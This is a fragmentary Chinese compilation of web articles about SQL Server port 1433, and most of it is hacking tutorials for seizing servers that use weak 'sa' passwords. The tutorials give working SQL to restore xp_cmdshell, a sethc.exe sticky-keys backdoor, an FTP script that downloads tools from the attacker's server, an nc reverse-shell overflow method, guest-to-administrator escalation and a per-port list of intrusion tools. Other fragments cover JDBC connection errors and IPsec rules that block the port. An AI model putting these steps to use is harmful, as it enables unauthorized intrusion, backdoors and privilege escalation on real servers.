利用SQL之1433端口巧妙入侵服务器

合集下载

通过端口1433连接到主机localhost的tcpip连接失败错误“connectionrefused

通过端口1433连接到主机localhost的tcpip连接失败错误“connectionrefused

通过端口1433连接到主机localhost的tcpip连接失败。

错误“connectionrefused&nERROR:通过端口1433 连接到主机localhost 的TCP/IP 连接失败。

错误:“Connection refused:connect。

请验证连接属性,并检查SQL Server 的实例正在主机上运行,且在此端口接受TCP/IP连接,还要确保防火墙没有阻止到此端口的TCP连接。

”。

最近要学数据库,老师用的是microsoft sqlserver2005, 我是学java的,一直都JDBC来连oracle数据库的,这次我装了microsoftsqlserver 2005,想用JDBC 来连microsoft sqlserver 2005,没想出了这样的问题:com.microsoft.sqlserver.jdbc.SQLServerException:通过端口1433连接到主机localhost的TCP/IP连接失败。

错误:“Connection refused:connect。

请验证连接属性,并检查SQLServer的实例正在主机上运行,且在此端口接受TCP/IP连接,还要确保防火墙没有阻止到此端口的TCP连接。

”。

atcom.microsoft.sqlserver.jdbc.SQLServerException.makeFromD riverError(SQLServerException.java:171)atcom.microsoft.sqlserver.jdbc.SQLServerConnection.connectHel per(SQLServerConnection.java:1033)atcom.microsoft.sqlserver.jdbc.SQLServerConnection.login(SQLServerConnection.java:817)atcom.microsoft.sqlserver.jdbc.SQLServerConnection.connect(SQ LServerConnection.java:700)atcom.microsoft.sqlserver.jdbc.SQLServerDriver.connect(SQLSer verDriver.java:842)atjava.sql.DriverManager.getConnection(DriverManager.java:582 )atjava.sql.DriverManager.getConnection(DriverManager.java:185 )atcom.luoying.TestSQLServer2.main(TestSQLServer2.java:15)我的代码如下:。

利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器利用1433端口提权相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法;1、未找到储存过程!那就来修复下吧!用到SQL语句:xp_cmdshell新的恢复办法第一步先删除:drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复:dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")直接恢复,不管sp_addextendedproc是不是存在图12、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图23、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL找到了哈哈!图34、恢复!用到SQL语句:第一exec sp_dropextendedproc 'xp_cmdshell'第二dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")恢复好了图45、提下权 net net1 都拒绝访问!管理降低了权限!图56、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!用到CMD命令:五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.execopy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe图67、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o,'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';第二:declare @oo intexec sp_oacreate 'scripting.filesystemobject', @oo outexec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图78、这里是本节的重点了!利用传马的方式提权!首先自己架设一个FTP 或是自己已经有FTP的!把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!把FTP传马方式的语句一句一句复制执行DOS命令!用到CMD命令:echo open FTP> xiuxiu.txt 注意 xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txtecho 密码>> xxxx.txtecho binary >> xxxx.txtecho get net的名字.exe>> xxxx.txtecho bye >> xxxx.txtftp -s:xxxx.txtdel xxxx.txt. /q /f图89、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图910、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!图1011、我XXxX 我自己的 net好象没加权限吧! 居然不能执行返回了以下数据!发生系统错误5...这很多人都遇见过!其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!图1112、嘿嘿 net1后成功了! 提权成功!图1213、远程登录成功图13。

1433提权全教程

1433提权全教程

1433端口提权的过程随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。

插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。

把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。

原因: 126(找不到指定的模块。

)。

这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。

SQL注入攻击是黑客对数据库进行攻击的常用手段

SQL注入攻击是黑客对数据库进行攻击的常用手段

SQL注入攻击是黑客对数据库进行攻击的常用手段之一。

随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。

但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。

用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。

SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。

但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。

能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。

下面从SOL注入的背景讲起,再谈谈如何防御等问题。

一SQL注入攻击的背景:在计算机技术高速发展的今天,越来越让人们头疼的是面临越来越“变态”和复杂的威胁网站技术,他们利用Internet 执行各种恶意活动,如身份窃取、私密信息窃取、带宽资源占用等。

它们潜入之后,还会扩散并不断更新自己。

这些活动常常利用用户的好奇心,在用户不知道或未来允许的情况下潜入用户的PC,不知不觉中,帐户里的资金就被转移了,公司讯息也被传送出去,危害十分严重。

2006年8月16日,第一个Web威胁样本出现,截止到2006年10月25日,已经产生了第150个变种,并且,还在不断地演化下去。

网站威胁的目标定位有多个维度,是个人还是公司,还是某种行业,都有其考虑,甚至国家、地区、性别、种族、宗教等也成为发动攻击的原因或动机。

攻击还会采用多种形态,甚至是复合形态,比如病毒、蠕虫、特洛伊、间谍软件、僵尸、网络钓鱼电子邮件、漏洞利用、下载程序、社会工程、rootkit、黑客,结果都可以导致用户信息受到危害,或者导致用户所需的服务被拒绝和劫持。

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。

(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。

(小榕的注入软件)。

5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。

(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。

(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。

如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。

7. 6129端口用DameWare6129.exe入侵。

8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。

9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。

电子商务安全的案例分析

电子商务安全的案例分析

电子商务安全的案例分析电子商务发展给人类社会带来的巨大影响使一系列相关领域的研究成为全球热点。

近年来,电子商务的发展已逐步放慢了脚步,其中安全问题是阻碍其发展的主要原因之一。

以下是店铺分享给大家的关于电子商务安全的案例,一起来看看吧!电子商务安全的案例篇12012年1月,亚马逊旗下美国电子商务网站Zappos遭到黑客网络攻击,2400万用户的电子邮件和密码等信息被窃取。

同年7月,雅虎、Linkedin和安卓论坛累计超过800万用户信息泄密,而且让人堪忧的是,部分网站的密码和用户名称是以未加密的方式储存在纯文字档案内,意味着所有人都可使用这些信息。

电子商务安全的案例篇21999年11月该网站运行于Windows NT 4.0上,web server为IIS4.0,补丁号为Service Pack5。

该网站管理员在11月的某一天发现其web网站上的用户资料和电子配件数据库被入侵者完全删除!严重之处更在于该数据库没有备份,网站运行半年来积累的用户和资料全部丢失。

系统管理员反复检查原因,通过web日志发现破坏者的调用web程序记录,确定了当时用户的IP是202.103.xxx.xxx(出于众所周知的原因这里隐藏了后两位),而这个IP来自于某地一个ISP的一台代理服务器。

这个202.103.xxx.xx的服务器安装了Wingate的代理软件。

破坏者浏览电子公司的网站是用该代理访问的。

这件事情给电子公司带来的损失是很严重的,丢失了半年的工作成果。

入侵者同时给202.103.xxx。

xxx带来了麻烦,电子公司报了案,协查通报到了202.103.xxx。

xxx这个ISP所在地的公安局。

该代理服务器的系统管理员是本站一位技术人员F的朋友。

F通过对受害者的服务器进行安全检查发现了原因。

首先,其端口1433为开放,SQL数据库服务器允许远程管理访问;其次,其IIS服务器存在ASP的bug,允许任何用户查看ASP源代码,数据库管理员帐号sa和密码以明文的形式存在于ASP 文件中。

通过端口1433连接到主机127...

通过端口1433连接到主机127...

通过端⼝1433连接到主机127...我们在连接数据库时总会出现⼀些问题,今天给⼤家分享遇到通过端⼝1433连接到主机127.0.0.1的 TCP/IP 连接失败。

错误:“connect timed out的解决办法。

环境:SQLServer 2008 R2 + MyEclipse 6.5 + JDK 1.6.24问题:Java通过JDBC连接SQLServer 2008,出现如下问题:通过端⼝1433 连接到主机127.0.0.1 的TCP/IP 连接失败。

错误:“connect timed out。

请验证连接属性,并检查 SQL Server 的实例正在主机上运⾏,且在此端⼝接受 TCP/IP 连接,还要确保防⽕墙没有阻⽌到此端⼝的 TCP 连接。

解决⽅案:1. 打开SQLServer 配置管理器------->SQLServer for MSQLSERVER------->TCP/IP------->如果没有启动,则启动------->右键属性------->IPAddresses------->IP All------->将TCP端⼝改为1433;2. 打开SQLServer 配置管理器------->SQL Native Client 10.0 Configuration------->CP/IP------->如果没有启动,则启动------->右键属性------->将Default Port(默认端⼝)改为1433;3. 控制⾯板------->系统和安全------->Windows FireWall(Windows 防⽕墙)------->TurnWindows FireWall on or off------->将Windows防⽕墙关闭。

问题得到了完美解决。

在实际操作的时候总会碰到各种各样的错误,最好的办法就是把它记录下来,以后再遇到相同问题时,就省去很多⿇烦。

1433端口安全防护

1433端口安全防护

究竟什么是1433端口呢??,1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。

其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。

很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。

可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口。

不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。

在实例属性中选择TCP/IP协议的属性。

选择隐藏SQL Server 实例。

如果隐藏了SQL Server 实例,则将禁止对试图枚举网络上现有的SQL Server 实例的客户端所发出的广播作出响应。

这样,别人就不能用1434来探测你的TCP/IP端口了(除非用Port Scan。

知道什么是1433端口了,鉴于对SQL数据库的入侵,大部分都是通过1433端口实现的,(额补充下MYSQL的默认端口是3306,原理是一样的)可以用很多端口扫描工具看看是否开启了这个端口。

关于如何入侵,怎么入侵,就不多说了,嘿嘿,网上也有很多,这里要注意的是,防止入侵,关了这个端口就OK了,请看下面的教程。

一.创建IP筛选器和筛选器操作1."开始"->"程序"->"管理工具"->"本地安全策略"。

微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的。

2.右击"Ip安全策略,在本地机器",选择"管理IP 筛选器表和筛选器操作",启动管理IP 筛选器表和筛选器操作对话框。

不同端口的入侵方法

不同端口的入侵方法
21端口:
21端口是默认的FTP端口,利用方式:弱口令探测/溢出
目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多SSH远程登录协议,利用方式:弱口令探测
23端口
23端口是TLENET的默认端口,利用方式:弱口令探测/溢出
135端口
135端口提供查询服务。利用方式:IPC$(Internet Process Connection)入侵。
网上教程非常多,不多说了。
137端口
137端口统共NetBIOS 数据报(UDP)服务。
139端口
139端口提供共享资源服务(NetBios-SSN),用在IPC$入侵中。上面这三个端口可以综合利用。
端口:7
服务:Echo
说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。
端口:19
服务:Character Generator
说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
端口:80
服务:HTTP
说明:用于网页浏览。木马Executor开放此端口。
端口:99
服务:metagram Relay
说明:后门程序ncx99开放此端口。
端口:102
服务:Message transfer agent(MTA)-X.400 over TCP/IP

系统安装SQLSever2000后1433端口未开放,如何打开1433端口的解决方法

系统安装SQLSever2000后1433端口未开放,如何打开1433端口的解决方法

系统安装SQLSever2000后1433端⼝未开放,如何打开1433端⼝的解决⽅法这篇⽂章主要针对Win2003系统安装SQL Sever2000后1433端⼝未开放,如何打开1433端⼝的解决⽅法。

⽤了⼏年的Windows2003和SQL Server2000了,不过这个问题倒是头次遇到。

最近调试⼀个JSP+SQL2000WEB程序遇到个现象,在Win2003简体中⽂服务器版上安装SQL Server2000,默认安装,⼀切正常,但是在安装完成后Tomcat运⾏正常,JSP程序却⽆法连接SQL2000数据库,查看端⼝,1433端⼝居然未开放,当然更不⽤说远程连接了。

⼀般分析的都是这样:1、sql server服务没有启动;检查服务启动,重新启动服务故障依然。

2、修改了端⼝号;打开⽹络实⽤⼯具,检查启⽤的协议中有TCP/IP协议,查看端⼝,是1433没错。

3、客户端实⽤⼯具作了改动;打开客户端实⽤⼯具,检查协议端⼝正常,重新创建⼀个别名,依然不⾏。

4、安装的问题;怀疑安装步骤有问题。

遂卸载重装,⼀切默认,故障依然。

5、安装版本的问题;查看安装光盘,是久经考验的安装盘,应该不会出问题。

6、系统的问题;也看不出有什么其它的问题,难道是系统的问题?不过重装系统可太过⿇烦,还是先想想其它的办法,看能不能找到问题所在。

检查系统⽇志,这个应该是⼀个⽐较好的习惯。

仔细翻了⼀遍重新安装后的⽇志,赫然发现如下内容:您运⾏的 Microsoft SQL Server 2000 版本或 Microsoft SQL Server 2000 Desktop Engine (也称为 MSDE) 和Microsoft Windows Server 2003 家族使⽤时存在已知的安全弱点。

为了减少计算机被某些病毒的攻击,Microsoft SQL Server 2000,MSDE 或两者的 TCP/IP 和 UDP ⽹络端⼝被禁⽤。

如何解决SQLServer2005端口1433总是受到远程连接的问题

如何解决SQLServer2005端口1433总是受到远程连接的问题

如何解决SQLServer2005端口1433总是受到远程连接的问题第一篇:如何解决SQL Server 2005端口1433总是受到远程连接的问题如何解决 SQL Server 2005 端口 1433 总是受到远程连接的问题2008-6-14 18:04 提问者:红色狂想 | 浏览次数:2553 次我是 Windows Server 2003 Enterprise Edition SP2 操作系统,安装的是 SQL Server 2005 Enterprise Edition,每当开机持续一段时间后,就会看到通知区域本地连接的图标不断闪亮,打开防火墙发现有来自不同国家地区的源 IP 地址试图连接本地端口 1433,有连接后断开的,也有正在连接中的,总而言之就是这么反复着,不知有没有什么风险。

我安装 SQL Server 只是为了用于 Web 网站,完全用不着给远程用户提供SQL 访问服务,为了提高安全性,有没有什么办法只让本机能访问 SQL Server,不让远程用户连接 1433 端口呢?问题补充:谢谢大家的建议,以上我的问题基本都解决了。

关于端口1433 受到远程连接的问题我是这样解决的,Windows 防火墙“例外”里面添加端口1433,在将“更改范围”设置为自己的本机地址192.168.1.2,127.0.0.1/255.255.255.0 这样是不是就可以避免再受到远程连接的骚扰了呢?反正这两天我观察 SQL Server 日志没有再发现有来自远程 IP 的登录请求。

当然也有可能是因为我启用了 Windows 防火墙的原因,阻止了一切外部非授权的连接。

因为我的部署主要是Web 与 ASP 应用,所以 TCP/IP 连接是必须的。

我来帮他解答 2008-6-14 21:36满意回答1 隐藏服务器这样可以避免很多扫描工具的扫描2 修改数据库的端口3 利用防火墙的策略禁止某些 ip 段的 ip 或者是端口访问系统4 如果你的系统和你的数据库是在同一台机器上则可以考虑去除掉sqlserver 验证只使用 windows 验证甚至可以考虑使用命名管道连接去除掉 tcp/ip 的连接第二篇:小结SQLServer连接失败错误及解决小结SQL Server连接失败错误及解决在使用 SQL Server 的过程中,用户遇到的最多的问题莫过于连接失败了。

入侵实例

入侵实例

龙域网安入侵系列教程——主讲人:Router这节课给大家讲一下1433端口的入侵及入侵过程中一些常见的情况,我们先来了解下1433端口。

1433端口简介:SQL Server微软出的一款数据库软件,使之客户与主机交流的这么一个程序。

SQL Server使用的1433端口,其中Sa权限为最高权限,我们就是利用肉鸡Sa口令漏洞来入侵的,而一般开1433端口的大多是服务器,所以很受大家的“喜爱”!可惜现在1433的服务器很难扫,至少我还没扫到过服务器,基本上都是xp,偶尔有几个2000(可能是我扫的次数少吧)。

虽然漏洞有点老,但是方法我们还是要掌握的,说不定哪天就用到了。

入侵方法:步骤一:扫描开放1433的端口的主机用纯真IP数据库找一段IP,然后开扫,结果要保存,这里大家自己操作了步骤二:扫sql弱口令,用X-Scan,选择SQL弱口令,然后开扫。

在虚拟机里扫下吧有点慢•节省时间提前扫好了,系统类型不出意外的话还是XP,也在我意料之中。

记得以前扫1433的都是不能执行命令的,为了做教程抽时间扫了一下,没想到都是可以执行命令的,害我扫了好几个IP段才找到台不能执行命令的。

步骤三:执行sql语句拿到cmd shell。

(重点就是这里了)连接sql的工具以前很多人都是用SQL Tools,虽然用起来也算不错但是如果遇到不能执行命令的主机还要另外用分离器,有点麻烦。

所以这里推荐一款工具给大家sqltools,算是新一代的工具吧,可能很多人已经用过了,它的优点就是可以直接执行sql命令,直接恢复xp_cmdshell。

关于的恢复xp_cmdshell网上也有很多方法,这里就介绍个简单的,想要了解更多的话大家可以上网查下。

主要就是两个sql命令:恢复dbccaddextendedproc ("sp_oacreate","odsole70.dll")dbccaddextendedproc ("xp_cmdshell","xplog70.dll")这样可以直接恢复,不用去管sp_addextendedproc是不是存在,原理就不多讲了,还是来看看效果吧连的时候也有点卡,刚才我们第一个工具如果出现刚才那个错误就没办法了,下面换我们的另一个工具,虽然不能执行命令但是这时可以查看文件系统XP,装的瑞星,下面我们恢复xp_cmdshel,看到了没,这样就能执行命令了换另一台试试,提前我没测试的,晕,打开错了,卡应该还是XP,还有QQ和千千静听呢,服务器可不会有这个的,好了,简单回复cmdshell就是这样的了,不过有些时候这个方法也恢复不了呢。

sql电脑防火墙如何打开1433端口

sql电脑防火墙如何打开1433端口

sql电脑防火墙如何打开1433端口sql电脑防火墙想要设置打开1433端口,用什么方法好呢?下面由店铺给你做出详细的sql电脑防火墙打开1433端口方法介绍!希望对你有帮助!sql电脑防火墙打开1433端口方法一:SQL SERVER2008默认端口即1433,如果开启了SQL SERVER 的MSSQLSERVER服务,那么1433就开启了;如果是在其它计算机上访问,可能还需要将SQL服务器上的防火墙关闭,或者允许1433出站即可。

sql电脑防火墙打开1433端口方法二:win7开启1433端口的步骤:1、点开始——控制面板;2、点系统和安全;3、点Windows防火墙;4、点高级设置;5、点入站规则,点新建规则;注:入站规则:别人电脑访问自己电脑;出站规则:自己电脑访问别人电脑。

6、选中端口,点下一步;7、选中TCP;选中特定本地端口:输入1433,点下一步;8、选中允许连接,点下一步;9、全部选中,点下一步;10、输入端口名称,点完成;11、然后选择出站规则,点新建规则,操作同上。

sql电脑防火墙打开1433端口方法三:其实Windows自带的防火墙非常垃圾,建议你把它关了。

基本上我装完Win7系统,第一件事就是关防火墙。

如果你有某些顾虑想开着防火墙也行,这个信息只是一个警告,不影响你安装SQL 2008的。

你照样装,装好了之后,你去防火墙设置里面,把C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe这个文件加入例外,就行了。

防火墙设置很容易找到,你按一下Windows按键,在Win7的搜索栏里打“防火墙”就可以找到,照着提示一步一步做吧,关掉也行,修改也行。

1433提权详解

1433提权详解

1433提权详解!!!随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。

插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。

把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。

原因: 126(找不到指定的模块。

)。

这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。

SQLServer修改默认端口号1433

SQLServer修改默认端口号1433

SQLServer修改默认端⼝号1433⽅法1:1. SqlServer服务使⽤两个端⼝:TCP-1433、UDP-1434。

其中1433⽤于供SqlServer对外提供服务,1434⽤于向请求者返回SqlServer使⽤了那个TCP/IP端⼝。

可以使⽤SQL Server的企业管理器更改SqlServer的默认TCP端⼝。

⽅法如下:a、打开企业管理器,依次选择左侧⼯具栏的“Microsoft SQL Servers - SQLServer组”,打开“SQL实例”(实际环境中为要修改的SQL Server 服务器名称)的属性对话框,点击“常规”选项卡的最下⽅的“⽹络配置(N)”按钮,就可以打开“SQLServer ⽹络使⽤⼯具”对话框。

b、在“启⽤的协议”列表⾥有TCP/IP协议,在属性⾥的默认端⼝选项中输⼊要修改的端⼝号即可修改。

还有⼀项为隐藏服务器,如果选中则表⽰着客户端⽆法通过枚举服务器来看到这台服务器,起到保护的作⽤,⽽且不影响连接。

2)SqlAgent服务使⽤TCP-1625、TCP-1640端⼝提供服务。

3)SQL查询分析器,通过1601端⼝访问1433,连接SqlServer⽅法2:打开Microsoft SQL Server--服务器⽹络实⽤⼯具--启⽤的协议--TCP/IP--属性--默认端⼝上述⽅法最好是在停⽌了服务器后,再进⾏修改。

注意:在其他计算机上开始-运⾏-cmd-telnet 127.0.0.1 1433,察看是否能够连接到服务器的数据库端⼝,如果不能连接,确定数据库服务器的监听端⼝是否1433,如果没有正常监听数据库端⼝,可能是没有安装SP4,需要安装SP4补丁客户端配置如下:打开Microsoft SQL Server--客户端⽹络实⽤⼯具--别名,添加相应的IP,端⼝即可。

ADO 字符串连接如下:"Provider=SQLOLEDB.1;Persist SecurityInfo=False;Data Source =127.0.0.1,2001;NetworkLibrary=DBMSSOCN; User ID=;Password=; Initial Catalog=tempdb";。

1433端口的溢出攻击

1433端口的溢出攻击

在win2000机器上装了mssql的话,机器就会开1433端口。

什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。

在机器上买mssql就上1433窗。

溢出1433需要两个工具:nc.exe和sql2.exe,在都有下载。

进攻方法就两步:第一步,在自己机器上开一个cmd窗口。

对了,你要用win2000的话,就开始-运行-写入cmd 回车。

这里我们只用2000,不说98。

如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。

这步的意思是用nc这个工具开一个40的端口监听。

第二步:再在开始-运行-写入cmd回车,再开一个窗口。

在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。

这里要作点说明:如何得到入侵网站ip?在cmd下c:>ping 就可以看到了。

自己的ip呢?在cmd下c:>ipconfig就可以看到了。

其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。

再是命令中的0不行的话,你就试试1或2。

如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\winnt\system32>.就是说,你已经进入它的机器里了。

进去以后,你可以填加个用户了。

net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。

net user guest 123456这样guest的密码变成123456了。

net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

本贴包含图片附件:第二:1433空密码入侵。

1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。

那么我们就可以用supersqlexec.exe连接上去,这东东在也有下。

SQL2000的1433端口修改方法

SQL2000的1433端口修改方法
6步1433改成18090此ip改成外网ip如果是路由器连接上网的请设置路由映射端口1433或您改成的端口18090
步骤一:在如下路径找到1步文件双击打开
C:\Program Files\Microsoft SQL Server\80\Tools\Binn
例:3步1433改成34286确定。
把1433改成非常用端口号,例:18090
步骤二:打开服务端文件夹内:TEL.exe如下图:
例:登陆。
1.SQL2000的TCP: sqlserver端口默认为1433,建议修改端口后按新端口号使用,以避免病毒入侵。
(常有木马扫描此1433知名端口,所以建议修改成不知名端口使用)
注意事项
如果是拨号上网用户,没有使用路由器只护的客户断网后安装SQL2000,请修改端口号再连接上网。

关闭端口1433,阻止sql2000服务器远程入侵

关闭端口1433,阻止sql2000服务器远程入侵

设置安全策略:
“控制面板”——〉“管理工具”——〉“本地安全策略”
选择IP安全策略—创建IP安全策略—建立名称—默认下一步
OK 建立新的策略完成选择你新建的策略–属性然后添加
下一步
选择Kerberos V5协议继续下一步选择是选择所有IP通讯
继续下一步完成选中“所有IP 通讯”——〉点“编辑”按钮,打开“IP筛选器列表”——〉继续点“编辑”按钮,打开“筛选器属性”
完成上面配置后在你刚配置的策略右键指派
指派出错的请启动下图服务。

配置完成后重新启动机器。

如何验证数据库的1433已经不能连接?
方法一:
局域网内找一个机器(非本机)安装企业管理,添加注册刚刚配制过安全策略的服务器,应
该是那个等待注册的画面,状态中显示:“正在验证注册信息”或拒绝连接或服务未开启的提示。

方法二:
